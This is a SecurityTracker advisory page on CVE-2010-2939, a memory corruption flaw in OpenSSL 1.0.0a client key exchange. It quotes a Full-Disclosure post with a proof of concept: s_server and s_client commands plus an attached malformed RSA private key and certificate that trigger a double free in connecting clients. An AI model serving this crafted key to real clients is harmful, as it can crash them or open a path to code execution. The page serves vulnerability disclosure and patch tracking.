SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (VPN)  >   OpenSSL Vendors:   OpenSSL.org
OpenSSL Key Exchange Memory Corruption Error Lets Remote Users Deny Service
SecurityTracker Alert ID:  1024296
SecurityTracker URL:  http://securitytracker.com/id/1024296
CVE Reference:   CVE-2010-2939   (Links to External Site)
Updated:  Aug 20 2010
Original Entry Date:  Aug 9 2010
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.0a; possibly other versions
Description:   A vulnerability was reported in OpenSSL. A remote user can cause denial of service conditions and may be able to execute arbitrary code on the target user's system.

A remote server can return specially crafted data to a connected client to trigger a memory corruption error and cause the target client to crash or potentially execute arbitrary code.

Georgi Guninski reported this vulnerability.

Impact:   A remote user can cause denial of service conditions.

A remote user may be able to execute arbitrary code on the target user's system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.openssl.org/ (Links to External Site)
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 29 2010 (NetBSD Issues Fix) OpenSSL Key Exchange Memory Corruption Error Lets Remote Users Deny Service
NetBSD has issued a fix.
Nov 29 2010 (FreeBSD Issues Fix) OpenSSL Key Exchange Memory Corruption Error Lets Remote Users Deny Service   (FreeBSD Security Advisories <security-advisories@freebsd.org>)
FreeBSD has issued a fix for FreeBSD 7.1, 7.3, 8.0, and 8.1.



 Source Message Contents

Date:  Sat, 7 Aug 2010 14:07:30 +0300
Subject:  [Full-disclosure] openssl-1.0.0a


--x+6KMIRAuhnl3hBn
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

openssl-1.0.0a on ubuntu, debian and arch.

attached a private(lol) key and a cert.

~/local/bin/openssl s_server -www -accept 8888 -cert /tmp/CA.cert  -key /tmp/CA.key

~/local/bin/openssl s_client -connect localhost:8888

depth=0 CN = CA
verify return:1
*** glibc detected *** /home/build/local/bin/openssl: double free or corruption (fasttop): 0x0000000000979300 ***

~/local/bin/openssl rsa -check -in /tmp/CA.key |more
writing RSA key
RSA key error: q not prime # definitely

-- 


--x+6KMIRAuhnl3hBn
Content-Type: application/pgp-keys
Content-Disposition: attachment; filename="CA.key"

-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----


--x+6KMIRAuhnl3hBn
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="CA.cert"

-----BEGIN CERTIFICATE-----
MIIE9DCCAuegAwIBAgIJAM0Vp3F9zD86MA0GCSqGSIb3DQEBBQUAMA0xCzAJBgNV
BAMTAkNBMB4XDTEwMDgwNzA5MTQxMFoXDTExMDgwNzA5MTQxMFowDTELMAkGA1UE
AxMCQ0EwggIWMA0GCSqGSIb3DQEBAQUAA4ICAwAwggH+AoIB9TX4Eo4zvnzt6RIG
+EleSA89D6zfHzPx2L9jsZPxZcJ01lYDGiOAuFW09lloJ6iLMSS2GlA8pB5/1E8u
75vubs0w4L1QPrMRxQdUjp/j9yWwCxvYraL2tfyJVxTmMn6vUcZ5nuU7O3f6VBP1
hD4LeKII9H0sp5PzWaoXy/gBQKdAn7dV7dlCS/8V4AjF/HCqY/mwjkjdB37WEqQj
j/vYICARw7hdOKOW3D86uN4g209Kwc1wf34TUZCYVdP77o0xXHgaz9L10+j5cBSz
viC2Z7nOJ0mneAJSlEC892nvMoIvMhYwYr/twZjudNNc4tIXyfeQqM34AlwHYn3y
Jo560YpzX2IF1cs6wFdDqJxpyW1VuYlZAFbufn9A86wsFBr0QxppDjcaxZqBVOdz
t7bi8nXJE+JWpIDDrAW4T2ihqZENNbM7gkNL8+bjg3LcG2jbUOr3H5zVK+Q0x9+6
tLdIG5iRQCu8OI4Rd8nl8SqBAqjAXgniqRFqEzTKMEXN/9hzwl+jL2PrUfHOUxh3
J3IgAlqmlwVh+1gJl9VJf1DEn3Yn3ffMSLl/2L2dTVDxvoHnsjPEgtIAg6QzZR71
SQWeAHaZE3bJQAz1X9nWIxhw7bnRRj/EhwHJMQEalRRu2jIq+WN3aovrAMKEJeeL
U5i9LzVW8lLX7QIDAQABo24wbDAdBgNVHQ4EFgQUOod0n0f3AaUF0Tf9ttbmA3Fc
EjowPQYDVR0jBDYwNIAUOod0n0f3AaUF0Tf9ttbmA3FcEjqhEaQPMA0xCzAJBgNV
BAMTAkNBggkAzRWncX3MPzowDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOC
AfYAHKLWDAa/aR62Xi2jAOGOBtcoYYdttizIkMtEnxd2QivssVBn156sIbMIsXgi
emUWhm35E4LKYfoK9aEorsfno8aMrzeYCuL0Zbbn67C2dUT61B2T5XN8eru8HYAa
nVxvHNj92auUjeAy7yWc7Kyx+RWXtkLG9BJ6fJVHzOwifEgfhS1ngjBe3MuviXOy
2h7BfaNQ3IOvAhSnjlWNoPcBFoOoRIVjfRSViD5X8jj47ab2JTKVFAH4bXf2eXUp
shcG77QeANoGFvmTpiPuUhmuZSXG4dyKmSqeq9SgouKZkq7aT24fNAqdwJp+ZJWH
2wP8LLvfSoyFZICMZU3AFfa5r3BOom8YCSwmeGhk9QVfLMD3TDvnV0aGEwz5BGjA
obLckVV2/VzbwublODRPtdr92ZAygRwDaUlqlDdfTcwajcUhlEpl8GtU+qmTgLe7
mT9Diich73DTsowN83p8v0s2waNVgpW3cxmCEonwD+1f1qiFM2uaTNYNMFVdBLyP
Kl9IFqC3v7Wt8VYuMbPnjNezhr7enpfa4eB1CeF+pdCdq3FK03UsFzBMZ63Vt8ia
NVlc3+esFSiea9hL+ROA4tfGjhQZcbHn/yZ8gL3dyyzoz2JV5pKWHV4+7nkq2h6A
QdRYHN8MDeQlxKw9nGSmpyzoQrqDyepn
-----END CERTIFICATE-----

--x+6KMIRAuhnl3hBn
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--x+6KMIRAuhnl3hBn--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC